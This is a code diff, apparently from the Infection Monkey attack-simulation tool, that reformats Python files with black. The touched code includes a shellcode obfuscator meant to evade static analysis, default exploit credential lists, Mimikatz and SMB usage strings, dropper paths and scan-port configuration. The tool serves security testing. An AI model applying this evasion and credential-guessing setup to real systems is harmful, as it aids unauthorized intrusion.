             STATUS_PASSED: "Monkey didn't find open PostgreSQL servers. If you have such servers, look for alerts that "
-            "indicate attempts to access them. "
+            "indicate attempts to access them. ",
         },
         PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
         PILLARS_KEY: [DATA],
-        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
+        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
     },
     TEST_TUNNELING: {
         TEST_EXPLANATION_KEY: "The Monkey tried to tunnel traffic using other monkeys.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
             STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - "
             "restrict them. "
         },
         PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
         PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
-        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED]
+        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED],
     },
     TEST_COMMUNICATE_AS_NEW_USER: {
         TEST_EXPLANATION_KEY: "The Monkey tried to create a new user and communicate with the internet from it.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
             STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - "
             "restrict them to MAC only.",
-            STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network."
+            STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network.",
         },
         PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
         PILLARS_KEY: [PEOPLE, NETWORKS, VISIBILITY_ANALYTICS],
-        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
+        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
     },
     TEST_SCOUTSUITE_PERMISSIVE_FIREWALL_RULES: {
         TEST_EXPLANATION_KEY: "ScoutSuite assessed cloud firewall rules and settings.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
             STATUS_FAILED: "ScoutSuite found overly permissive firewall rules.",
-            STATUS_PASSED: "ScoutSuite found no problems with cloud firewall rules."
+            STATUS_PASSED: "ScoutSuite found no problems with cloud firewall rules.",
         },
         PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
         PILLARS_KEY: [NETWORKS],
-        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
+        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
     },
     TEST_SCOUTSUITE_UNENCRYPTED_DATA: {
         TEST_EXPLANATION_KEY: "ScoutSuite searched for resources containing unencrypted data.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
             STATUS_FAILED: "ScoutSuite found resources with unencrypted data.",
-            STATUS_PASSED: "ScoutSuite found no resources with unencrypted data."
+            STATUS_PASSED: "ScoutSuite found no resources with unencrypted data.",
         },
         PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
         PILLARS_KEY: [DATA],
-        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
+        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
     },
     TEST_SCOUTSUITE_DATA_LOSS_PREVENTION: {
         TEST_EXPLANATION_KEY: "ScoutSuite searched for resources which are not protected against data loss.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
             STATUS_FAILED: "ScoutSuite found resources not protected against data loss.",
-            STATUS_PASSED: "ScoutSuite found that all resources are secured against data loss."
+            STATUS_PASSED: "ScoutSuite found that all resources are secured against data loss.",
         },
         PRINCIPLE_KEY: PRINCIPLE_DISASTER_RECOVERY,
         PILLARS_KEY: [DATA],
-        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
+        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
     },
     TEST_SCOUTSUITE_SECURE_AUTHENTICATION: {
         TEST_EXPLANATION_KEY: "ScoutSuite searched for issues related to users' authentication.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
             STATUS_FAILED: "ScoutSuite found issues related to users' authentication.",
-            STATUS_PASSED: "ScoutSuite found no issues related to users' authentication."
+            STATUS_PASSED: "ScoutSuite found no issues related to users' authentication.",
         },
         PRINCIPLE_KEY: PRINCIPLE_SECURE_AUTHENTICATION,
         PILLARS_KEY: [PEOPLE, WORKLOADS],
-        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
+        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
     },
     TEST_SCOUTSUITE_RESTRICTIVE_POLICIES: {
         TEST_EXPLANATION_KEY: "ScoutSuite searched for permissive user access policies.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
             STATUS_FAILED: "ScoutSuite found permissive user access policies.",
-            STATUS_PASSED: "ScoutSuite found no issues related to user access policies."
+            STATUS_PASSED: "ScoutSuite found no issues related to user access policies.",
         },
         PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
         PILLARS_KEY: [PEOPLE, WORKLOADS],
-        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
+        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
     },
     TEST_SCOUTSUITE_LOGGING: {
         TEST_EXPLANATION_KEY: "ScoutSuite searched for issues, related to logging.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
             STATUS_FAILED: "ScoutSuite found logging issues.",
-            STATUS_PASSED: "ScoutSuite found no logging issues."
+            STATUS_PASSED: "ScoutSuite found no logging issues.",
         },
         PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING,
         PILLARS_KEY: [AUTOMATION_ORCHESTRATION, VISIBILITY_ANALYTICS],
-        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
+        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
     },
     TEST_SCOUTSUITE_SERVICE_SECURITY: {
         TEST_EXPLANATION_KEY: "ScoutSuite searched for service security issues.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
             STATUS_FAILED: "ScoutSuite found service security issues.",
-            STATUS_PASSED: "ScoutSuite found no service security issues."
+            STATUS_PASSED: "ScoutSuite found no service security issues.",
         },
         PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING,
         PILLARS_KEY: [DEVICES, NETWORKS],
-        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
-    }
+        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
+    },
 }

 EVENT_TYPE_MONKEY_NETWORK = "monkey_network"
@@ -282,7 +290,7 @@ PILLARS_TO_TESTS = {
     DEVICES: [],
     WORKLOADS: [],
     VISIBILITY_ANALYTICS: [],
-    AUTOMATION_ORCHESTRATION: []
+    AUTOMATION_ORCHESTRATION: [],
 }

 PRINCIPLES_TO_TESTS = {}
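The hunks above are black's "magic trailing comma" at work: once a literal spans multiple lines, black appends a comma after the last element so that adding an entry later touches only one line of the diff. A standalone sketch of the before/after shape (illustrative only, not from this repo):

# Before black: no trailing comma, so appending an item edits two lines.
pillars_before = [
    "DEVICES",
    "NETWORKS"
]

# After black v20.8b1: the trailing comma keeps future diffs one line long.
pillars_after = [
    "DEVICES",
    "NETWORKS",
]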
@@ -1,13 +1,13 @@
-AWS_KEYS_PATH = ['internal', 'monkey', 'aws_keys']
-STARTED_ON_ISLAND_PATH = ['internal', 'general', 'started_on_island']
-EXPORT_MONKEY_TELEMS_PATH = ['internal', 'testing', 'export_monkey_telems']
-CURRENT_SERVER_PATH = ['internal', 'island_server', 'current_server']
-SSH_KEYS_PATH = ['internal', 'exploits', 'exploit_ssh_keys']
-INACCESSIBLE_SUBNETS_PATH = ['basic_network', 'network_analysis', 'inaccessible_subnets']
-USER_LIST_PATH = ['basic', 'credentials', 'exploit_user_list']
-PASSWORD_LIST_PATH = ['basic', 'credentials', 'exploit_password_list']
-EXPLOITER_CLASSES_PATH = ['basic', 'exploiters', 'exploiter_classes']
-SUBNET_SCAN_LIST_PATH = ['basic_network', 'scope', 'subnet_scan_list']
-LOCAL_NETWORK_SCAN_PATH = ['basic_network', 'scope', 'local_network_scan']
-LM_HASH_LIST_PATH = ['internal', 'exploits', 'exploit_lm_hash_list']
-NTLM_HASH_LIST_PATH = ['internal', 'exploits', 'exploit_ntlm_hash_list']
+AWS_KEYS_PATH = ["internal", "monkey", "aws_keys"]
+STARTED_ON_ISLAND_PATH = ["internal", "general", "started_on_island"]
+EXPORT_MONKEY_TELEMS_PATH = ["internal", "testing", "export_monkey_telems"]
+CURRENT_SERVER_PATH = ["internal", "island_server", "current_server"]
+SSH_KEYS_PATH = ["internal", "exploits", "exploit_ssh_keys"]
+INACCESSIBLE_SUBNETS_PATH = ["basic_network", "network_analysis", "inaccessible_subnets"]
+USER_LIST_PATH = ["basic", "credentials", "exploit_user_list"]
+PASSWORD_LIST_PATH = ["basic", "credentials", "exploit_password_list"]
+EXPLOITER_CLASSES_PATH = ["basic", "exploiters", "exploiter_classes"]
+SUBNET_SCAN_LIST_PATH = ["basic_network", "scope", "subnet_scan_list"]
+LOCAL_NETWORK_SCAN_PATH = ["basic_network", "scope", "local_network_scan"]
+LM_HASH_LIST_PATH = ["internal", "exploits", "exploit_lm_hash_list"]
+NTLM_HASH_LIST_PATH = ["internal", "exploits", "exploit_ntlm_hash_list"]
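This file shows black's string quote normalization: the string contents never change, but single-quoted literals become double-quoted by default. A minimal sketch of the rule (this mirrors black's documented default behavior, not a utility in this repo):

# black rewrites 'internal' -> "internal"; the value is identical either way.
assert 'internal' == "internal"  # quoting is presentation only

# Strings containing a double quote keep single quotes to avoid adding escapes:
s = 'say "hi"'  # black leaves this one as-is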
@@ -1 +1 @@
-__author__ = 'itay.mizeretz'
+__author__ = "itay.mizeretz"
@@ -5,7 +5,7 @@ import socket
 import struct
 from abc import ABCMeta, abstractmethod

-__author__ = 'itamar'
+__author__ = "itamar"

 LOG = logging.getLogger(__name__)

@@ -48,14 +48,14 @@ class NetworkRange(object, metaclass=ABCMeta):
         address_str = address_str.strip()
         if NetworkRange.check_if_range(address_str):
             return IpRange(ip_range=address_str)
-        if -1 != address_str.find('/'):
+        if -1 != address_str.find("/"):
             return CidrRange(cidr_range=address_str)
         return SingleIpRange(ip_address=address_str)

     @staticmethod
     def check_if_range(address_str):
-        if -1 != address_str.find('-'):
-            ips = address_str.split('-')
+        if -1 != address_str.find("-"):
+            ips = address_str.split("-")
             try:
                 ipaddress.ip_address(ips[0]) and ipaddress.ip_address(ips[1])
             except ValueError:
@@ -85,28 +85,36 @@ class CidrRange(NetworkRange):
         return ipaddress.ip_address(ip_address) in self._ip_network

     def _get_range(self):
-        return [CidrRange._ip_to_number(str(x)) for x in self._ip_network if x != self._ip_network.broadcast_address]
+        return [
+            CidrRange._ip_to_number(str(x))
+            for x in self._ip_network
+            if x != self._ip_network.broadcast_address
+        ]


 class IpRange(NetworkRange):
     def __init__(self, ip_range=None, lower_end_ip=None, higher_end_ip=None, shuffle=True):
         super(IpRange, self).__init__(shuffle=shuffle)
         if ip_range is not None:
-            addresses = ip_range.split('-')
+            addresses = ip_range.split("-")
             if len(addresses) != 2:
-                raise ValueError('Illegal IP range format: %s. Format is 192.168.0.5-192.168.0.20' % ip_range)
+                raise ValueError(
+                    "Illegal IP range format: %s. Format is 192.168.0.5-192.168.0.20" % ip_range
+                )
             self._lower_end_ip, self._higher_end_ip = [x.strip() for x in addresses]
         elif (lower_end_ip is not None) and (higher_end_ip is not None):
             self._lower_end_ip = lower_end_ip.strip()
             self._higher_end_ip = higher_end_ip.strip()
         else:
-            raise ValueError('Illegal IP range: %s' % ip_range)
+            raise ValueError("Illegal IP range: %s" % ip_range)

         self._lower_end_ip_num = self._ip_to_number(self._lower_end_ip)
         self._higher_end_ip_num = self._ip_to_number(self._higher_end_ip)
         if self._higher_end_ip_num < self._lower_end_ip_num:
             raise ValueError(
-                'Higher end IP %s is smaller than lower end IP %s' % (self._lower_end_ip, self._higher_end_ip))
+                "Higher end IP %s is smaller than lower end IP %s"
+                % (self._lower_end_ip, self._higher_end_ip)
+            )

     def __repr__(self):
         return "<IpRange %s-%s>" % (self._lower_end_ip, self._higher_end_ip)
@@ -156,7 +164,7 @@ class SingleIpRange(NetworkRange):
         :return: A tuple in format (IP, domain_name). Eg. (192.168.55.1, www.google.com)
         """
         # The most common use case is to enter ip/range into "Scan IP/subnet list"
-        domain_name = ''
+        domain_name = ""

         # Try casting user's input as IP
         try:
@@ -167,8 +175,10 @@ class SingleIpRange(NetworkRange):
             ip = socket.gethostbyname(string_)
             domain_name = string_
         except socket.error:
-            LOG.error("Your specified host: {} is not found as a domain name and"
-                      " it's not an IP address".format(string_))
+            LOG.error(
+                "Your specified host: {} is not found as a domain name and"
+                " it's not an IP address".format(string_)
+            )
             return None, string_
         # If a string_ was entered instead of IP we presume that it was domain name and translate it
         return ip, domain_name
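The dispatch above turns a user-supplied string into one of three range types: "a-b" becomes an IpRange, anything containing "/" a CidrRange, and everything else a SingleIpRange (which resolves hostnames via socket.gethostbyname). A standalone illustration of the same dispatch rules (a sketch, not repo code):

import ipaddress

def classify(address_str: str) -> str:
    # Mirrors NetworkRange's checks: dash range first, then CIDR, then single IP/host.
    address_str = address_str.strip()
    parts = address_str.split("-")
    if len(parts) == 2:
        try:
            ipaddress.ip_address(parts[0]) and ipaddress.ip_address(parts[1])
            return "IpRange"
        except ValueError:
            pass
    if "/" in address_str:
        return "CidrRange"
    return "SingleIpRange"

assert classify("192.168.0.5-192.168.0.20") == "IpRange"
assert classify("10.0.0.0/24") == "CidrRange"
assert classify("www.google.com") == "SingleIpRange"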
@ -15,6 +15,6 @@ def get_host_from_network_location(network_location: str) -> str:
|
||||||
|
|
||||||
def remove_port(url):
|
def remove_port(url):
|
||||||
parsed = urlparse(url)
|
parsed = urlparse(url)
|
||||||
with_port = f'{parsed.scheme}://{parsed.netloc}'
|
with_port = f"{parsed.scheme}://{parsed.netloc}"
|
||||||
without_port = re.sub(':[0-9]+(?=$|/)', '', with_port)
|
without_port = re.sub(":[0-9]+(?=$|/)", "", with_port)
|
||||||
return without_port
|
return without_port
|
||||||
|
|
|
@ -12,6 +12,6 @@ class TestNetworkUtils(TestCase):
|
||||||
assert get_host_from_network_location("user:password@host:8080") == "host"
|
assert get_host_from_network_location("user:password@host:8080") == "host"
|
||||||
|
|
||||||
def test_remove_port_from_url(self):
|
def test_remove_port_from_url(self):
|
||||||
assert remove_port('https://google.com:80') == 'https://google.com'
|
assert remove_port("https://google.com:80") == "https://google.com"
|
||||||
assert remove_port('https://8.8.8.8:65336') == 'https://8.8.8.8'
|
assert remove_port("https://8.8.8.8:65336") == "https://8.8.8.8"
|
||||||
assert remove_port('ftp://ftpserver.com:21/hello/world') == 'ftp://ftpserver.com'
|
assert remove_port("ftp://ftpserver.com:21/hello/world") == "ftp://ftpserver.com"
|
||||||
|
|
|
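Note how remove_port works: it first reduces the URL to scheme://netloc (dropping any path, which is why the ftp test expects no /hello/world), then strips ":<digits>" only when the lookahead (?=$|/) sees end-of-string or a slash next. A quick standalone check of the regex itself:

import re

pattern = ":[0-9]+(?=$|/)"
assert re.sub(pattern, "", "https://google.com:80") == "https://google.com"
# On a full URL the port is removed but the path survives (netloc stripping is separate):
assert re.sub(pattern, "", "ftp://ftpserver.com:21/hello/world") == "ftp://ftpserver.com/hello/world"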
@@ -8,21 +8,13 @@ class TestSegmentationUtils:
         target = CidrRange("2.2.2.0/24")

         # IP not in both
-        assert get_ip_in_src_and_not_in_dst(
-            ["3.3.3.3", "4.4.4.4"], source, target
-        ) is None
+        assert get_ip_in_src_and_not_in_dst(["3.3.3.3", "4.4.4.4"], source, target) is None

         # IP not in source, in target
-        assert (get_ip_in_src_and_not_in_dst(
-            ["2.2.2.2"], source, target
-        )) is None
+        assert (get_ip_in_src_and_not_in_dst(["2.2.2.2"], source, target)) is None

         # IP in source, not in target
-        assert (get_ip_in_src_and_not_in_dst(
-            ["8.8.8.8", "1.1.1.1"], source, target
-        ))
+        assert get_ip_in_src_and_not_in_dst(["8.8.8.8", "1.1.1.1"], source, target)

         # IP in both subnets
-        assert (get_ip_in_src_and_not_in_dst(
-            ["8.8.8.8", "1.1.1.1"], source, source
-        )) is None
+        assert (get_ip_in_src_and_not_in_dst(["8.8.8.8", "1.1.1.1"], source, source)) is None
@@ -13,17 +13,29 @@ class ScanStatus(Enum):


 class UsageEnum(Enum):
-    SMB = {ScanStatus.USED.value: "SMB exploiter ran the monkey by creating a service via MS-SCMR.",
-           ScanStatus.SCANNED.value: "SMB exploiter failed to run the monkey by creating a service via MS-SCMR."}
-    MIMIKATZ = {ScanStatus.USED.value: "Windows module loader was used to load Mimikatz DLL.",
-                ScanStatus.SCANNED.value: "Monkey tried to load Mimikatz DLL, but failed."}
-    MIMIKATZ_WINAPI = {ScanStatus.USED.value: "WinAPI was called to load mimikatz.",
-                       ScanStatus.SCANNED.value: "Monkey tried to call WinAPI to load mimikatz."}
-    DROPPER = {ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."}
-    SINGLETON_WINAPI = {ScanStatus.USED.value: "WinAPI was called to acquire system singleton for monkey's process.",
-                        ScanStatus.SCANNED.value: "WinAPI call to acquire system singleton"
-                                                  " for monkey process wasn't successful."}
-    DROPPER_WINAPI = {ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."}
+    SMB = {
+        ScanStatus.USED.value: "SMB exploiter ran the monkey by creating a service via MS-SCMR.",
+        ScanStatus.SCANNED.value: "SMB exploiter failed to run the monkey by creating a service via MS-SCMR.",
+    }
+    MIMIKATZ = {
+        ScanStatus.USED.value: "Windows module loader was used to load Mimikatz DLL.",
+        ScanStatus.SCANNED.value: "Monkey tried to load Mimikatz DLL, but failed.",
+    }
+    MIMIKATZ_WINAPI = {
+        ScanStatus.USED.value: "WinAPI was called to load mimikatz.",
+        ScanStatus.SCANNED.value: "Monkey tried to call WinAPI to load mimikatz.",
+    }
+    DROPPER = {
+        ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."
+    }
+    SINGLETON_WINAPI = {
+        ScanStatus.USED.value: "WinAPI was called to acquire system singleton for monkey's process.",
+        ScanStatus.SCANNED.value: "WinAPI call to acquire system singleton"
+        " for monkey process wasn't successful.",
+    }
+    DROPPER_WINAPI = {
+        ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."
+    }


 # Dict that describes what BITS job was used for
@@ -31,8 +43,10 @@ BITS_UPLOAD_STRING = "BITS job was used to upload monkey to a remote system."


 def format_time(time):
-    return "%s-%s %s:%s:%s" % (time.date().month,
-                               time.date().day,
-                               time.time().hour,
-                               time.time().minute,
-                               time.time().second)
+    return "%s-%s %s:%s:%s" % (
+        time.date().month,
+        time.date().day,
+        time.time().hour,
+        time.time().minute,
+        time.time().second,
+    )
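format_time renders month-day hour:minute:second with no zero padding, since %s simply str()s each component. A quick standalone check of the same expression:

from datetime import datetime

t = datetime(2021, 4, 7, 9, 5, 3)
formatted = "%s-%s %s:%s:%s" % (
    t.date().month,
    t.date().day,
    t.time().hour,
    t.time().minute,
    t.time().second,
)
assert formatted == "4-7 9:5:3"  # single-digit fields are not padded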
@@ -1,14 +1,13 @@
 import sys

-if sys.platform == 'win32':
+if sys.platform == "win32":
     import win32com
     import wmi

-__author__ = 'maor.rayzin'
+__author__ = "maor.rayzin"


 class MongoUtils:
-
     def __init__(self):
         # Static class
         pass
@@ -35,7 +34,10 @@ class MongoUtils:
         try:
             # objectSid property of ds_user is problematic and need this special treatment.
             # ISWbemObjectEx interface. Class Uint8Array ?
-            if str(o._oleobj_.GetTypeInfo().GetTypeAttr().iid) == "{269AD56A-8A67-4129-BC8C-0506DCFE9880}":
+            if (
+                str(o._oleobj_.GetTypeInfo().GetTypeAttr().iid)
+                == "{269AD56A-8A67-4129-BC8C-0506DCFE9880}"
+            ):
                 return o.Value
         except Exception:
             pass
@@ -9,8 +9,8 @@ from Crypto.Cipher import AES  # noqa: DUO133  # nosec: B413

 # We only encrypt payloads to hide them from static analysis
 # it's OK to have these keys plaintext
-KEY = b'1234567890123456'
-NONCE = b'\x93n2\xbc\xf5\x8d:\xc2fP\xabn\x02\xb3\x17f'
+KEY = b"1234567890123456"
+NONCE = b"\x93n2\xbc\xf5\x8d:\xc2fP\xabn\x02\xb3\x17f"


 # Use this manually to get obfuscated bytes of shellcode
@@ -2,12 +2,11 @@ from unittest import TestCase

 from common.utils.shellcode_obfuscator import clarify, obfuscate

-SHELLCODE = b'1234567890abcd'
-OBFUSCATED_SHELLCODE = b'\xc7T\x9a\xf4\xb1cn\x94\xb0X\xf2\xfb^='
+SHELLCODE = b"1234567890abcd"
+OBFUSCATED_SHELLCODE = b"\xc7T\x9a\xf4\xb1cn\x94\xb0X\xf2\xfb^="


 class TestShellcodeObfuscator(TestCase):
-
     def test_obfuscate(self):
         assert obfuscate(SHELLCODE) == OBFUSCATED_SHELLCODE
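The bodies of obfuscate and clarify are outside this diff; given the fixed KEY/NONCE pair and the Crypto.Cipher.AES import above, they are presumably one symmetric cipher applied in both directions. A sketch under that assumption (EAX mode is a guess chosen because it accepts a 16-byte nonce and preserves length; the real module may use a different mode):

from Crypto.Cipher import AES  # pycryptodome

KEY = b"1234567890123456"
NONCE = b"\x93n2\xbc\xf5\x8d:\xc2fP\xabn\x02\xb3\x17f"

def obfuscate(shellcode: bytes) -> bytes:
    # A fresh cipher object per call; reusing the same key/nonce is what
    # makes the transformation reversible (and is fine here, since this
    # is obfuscation against static analysis, not real confidentiality).
    return AES.new(KEY, AES.MODE_EAX, nonce=NONCE).encrypt(shellcode)

def clarify(shellcode: bytes) -> bytes:
    return AES.new(KEY, AES.MODE_EAX, nonce=NONCE).decrypt(shellcode)

assert clarify(obfuscate(b"1234567890abcd")) == b"1234567890abcd"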
@@ -8,11 +8,10 @@ if sys.platform.startswith("win"):

 from .mongo_utils import MongoUtils

-__author__ = 'maor.rayzin'
+__author__ = "maor.rayzin"


 class WMIUtils:
-
     def __init__(self):
         # Static class
         pass
@@ -16,10 +16,12 @@ def get_version(build=BUILD):

 def print_version():
     parser = argparse.ArgumentParser()
-    parser.add_argument("-b", "--build", default=BUILD, help="Choose the build string for this version.", type=str)
+    parser.add_argument(
+        "-b", "--build", default=BUILD, help="Choose the build string for this version.", type=str
+    )
     args = parser.parse_args()
     print(get_version(args.build))


-if __name__ == '__main__':
+if __name__ == "__main__":
     print_version()

@@ -1 +1 @@
-__author__ = 'itay.mizeretz'
+__author__ = "itay.mizeretz"
@@ -5,14 +5,19 @@ import uuid
 from abc import ABCMeta
 from itertools import product

-__author__ = 'itamar'
+__author__ = "itamar"

 GUID = str(uuid.getnode())

-EXTERNAL_CONFIG_FILE = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), 'monkey.bin')
+EXTERNAL_CONFIG_FILE = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), "monkey.bin")

-SENSITIVE_FIELDS = ["exploit_password_list", "exploit_user_list", "exploit_ssh_keys", "aws_secret_access_key",
-                    "aws_session_token"]
+SENSITIVE_FIELDS = [
+    "exploit_password_list",
+    "exploit_user_list",
+    "exploit_ssh_keys",
+    "aws_secret_access_key",
+    "aws_session_token",
+]
 LOCAL_CONFIG_VARS = ["name", "id", "current_server", "max_depth"]
 HIDDEN_FIELD_REPLACEMENT_CONTENT = "hidden"

@@ -21,7 +26,7 @@ class Configuration(object):
     def from_kv(self, formatted_data):
         unknown_items = []
         for key, value in list(formatted_data.items()):
-            if key.startswith('_'):
+            if key.startswith("_"):
                 continue
             if key in LOCAL_CONFIG_VARS:
                 continue
@@ -45,7 +50,7 @@ class Configuration(object):
     def as_dict(self):
         result = {}
         for key in dir(Configuration):
-            if key.startswith('_'):
+            if key.startswith("_"):
                 continue
             try:
                 value = getattr(self, key)
@@ -75,10 +80,10 @@ class Configuration(object):
     ###########################

     use_file_logging = True
-    dropper_log_path_windows = '%temp%\\~df1562.tmp'
-    dropper_log_path_linux = '/tmp/user-1562'
-    monkey_log_path_windows = '%temp%\\~df1563.tmp'
-    monkey_log_path_linux = '/tmp/user-1563'
+    dropper_log_path_windows = "%temp%\\~df1562.tmp"
+    dropper_log_path_linux = "/tmp/user-1562"
+    monkey_log_path_windows = "%temp%\\~df1563.tmp"
+    monkey_log_path_linux = "/tmp/user-1563"
     send_log_to_server = True

     ###########################
@@ -88,16 +93,16 @@ class Configuration(object):
     dropper_try_move_first = True
     dropper_set_date = True
     dropper_date_reference_path_windows = r"%windir%\system32\kernel32.dll"
-    dropper_date_reference_path_linux = '/bin/sh'
+    dropper_date_reference_path_linux = "/bin/sh"
     dropper_target_path_win_32 = r"C:\Windows\temp\monkey32.exe"
     dropper_target_path_win_64 = r"C:\Windows\temp\monkey64.exe"
-    dropper_target_path_linux = '/tmp/monkey'
+    dropper_target_path_linux = "/tmp/monkey"

     ###########################
     # Kill file
     ###########################
-    kill_file_path_windows = '%windir%\\monkey.not'
-    kill_file_path_linux = '/var/run/monkey.not'
+    kill_file_path_windows = "%windir%\\monkey.not"
+    kill_file_path_linux = "/var/run/monkey.not"

     ###########################
     # monkey config
@@ -134,9 +139,7 @@ class Configuration(object):
     current_server = ""

     # Configuration servers to try to connect to, in this order.
-    command_servers = [
-        "192.0.2.0:5000"
-    ]
+    command_servers = ["192.0.2.0:5000"]

     # sets whether or not to locally save the running configuration after finishing
     serialize_config = False
@@ -150,7 +153,7 @@ class Configuration(object):
     keep_tunnel_open_time = 60

     # Monkey files directory name
-    monkey_dir_name = 'monkey_dir'
+    monkey_dir_name = "monkey_dir"

     ###########################
     # scanners config
@@ -165,22 +168,14 @@ class Configuration(object):
     blocked_ips = []

     # TCP Scanner
-    HTTP_PORTS = [80, 8080, 443,
-                  8008,  # HTTP alternate
-                  7001  # Oracle Weblogic default server port
-                  ]
-    tcp_target_ports = [22,
-                        2222,
-                        445,
-                        135,
-                        3389,
-                        80,
-                        8080,
-                        443,
-                        8008,
-                        3306,
-                        9200,
-                        5432]
+    HTTP_PORTS = [
+        80,
+        8080,
+        443,
+        8008,  # HTTP alternate
+        7001,  # Oracle Weblogic default server port
+    ]
+    tcp_target_ports = [22, 2222, 445, 135, 3389, 80, 8080, 443, 8008, 3306, 9200, 5432]
     tcp_target_ports.extend(HTTP_PORTS)
     tcp_scan_timeout = 3000  # 3000 Milliseconds
     tcp_scan_interval = 0  # in milliseconds
@@ -221,11 +216,11 @@ class Configuration(object):
         :return:
         """
         cred_list = []
-        for cred in product(self.exploit_user_list, self.exploit_password_list, [''], ['']):
+        for cred in product(self.exploit_user_list, self.exploit_password_list, [""], [""]):
             cred_list.append(cred)
-        for cred in product(self.exploit_user_list, [''], [''], self.exploit_ntlm_hash_list):
+        for cred in product(self.exploit_user_list, [""], [""], self.exploit_ntlm_hash_list):
             cred_list.append(cred)
-        for cred in product(self.exploit_user_list, [''], self.exploit_lm_hash_list, ['']):
+        for cred in product(self.exploit_user_list, [""], self.exploit_lm_hash_list, [""]):
             cred_list.append(cred)
         return cred_list
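Each loop above crosses every user with every secret of a single type via itertools.product, padding the remaining slots with empty strings, so every credential comes out as a uniform (user, password, lm_hash, ntlm_hash) tuple. A standalone illustration:

from itertools import product

users = ["Administrator", "root"]
passwords = ["Password1!", "1234"]

# Empty strings occupy the lm/ntlm slots when testing plain passwords.
creds = list(product(users, passwords, [""], [""]))
assert creds[0] == ("Administrator", "Password1!", "", "")
assert len(creds) == 4  # 2 users x 2 passwords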
@@ -241,15 +236,15 @@ class Configuration(object):
         password_hashed = hashlib.sha512(sensitive_data.encode()).hexdigest()
         return password_hashed

-    exploit_user_list = ['Administrator', 'root', 'user']
+    exploit_user_list = ["Administrator", "root", "user"]
     exploit_password_list = ["Password1!", "1234", "password", "12345678"]
     exploit_lm_hash_list = []
     exploit_ntlm_hash_list = []
     exploit_ssh_keys = []

-    aws_access_key_id = ''
-    aws_secret_access_key = ''
-    aws_session_token = ''
+    aws_access_key_id = ""
+    aws_secret_access_key = ""
+    aws_session_token = ""

     # smb/wmi exploiter
     smb_download_timeout = 300  # timeout in seconds
@@ -258,7 +253,16 @@ class Configuration(object):
     # Timeout (in seconds) for sambacry's trigger to yield results.
     sambacry_trigger_timeout = 5
     # Folder paths to guess share lies inside.
-    sambacry_folder_paths_to_guess = ['/', '/mnt', '/tmp', '/storage', '/export', '/share', '/shares', '/home']
+    sambacry_folder_paths_to_guess = [
+        "/",
+        "/mnt",
+        "/tmp",
+        "/storage",
+        "/export",
+        "/share",
+        "/shares",
+        "/home",
+    ]
     # Shares to not check if they're writable.
     sambacry_shares_not_to_check = ["IPC$", "print$"]
@@ -9,9 +9,11 @@ from requests.exceptions import ConnectionError

 import infection_monkey.monkeyfs as monkeyfs
 import infection_monkey.tunnel as tunnel
-from common.common_consts.timeouts import (LONG_REQUEST_TIMEOUT,
-                                           MEDIUM_REQUEST_TIMEOUT,
-                                           SHORT_REQUEST_TIMEOUT)
+from common.common_consts.timeouts import (
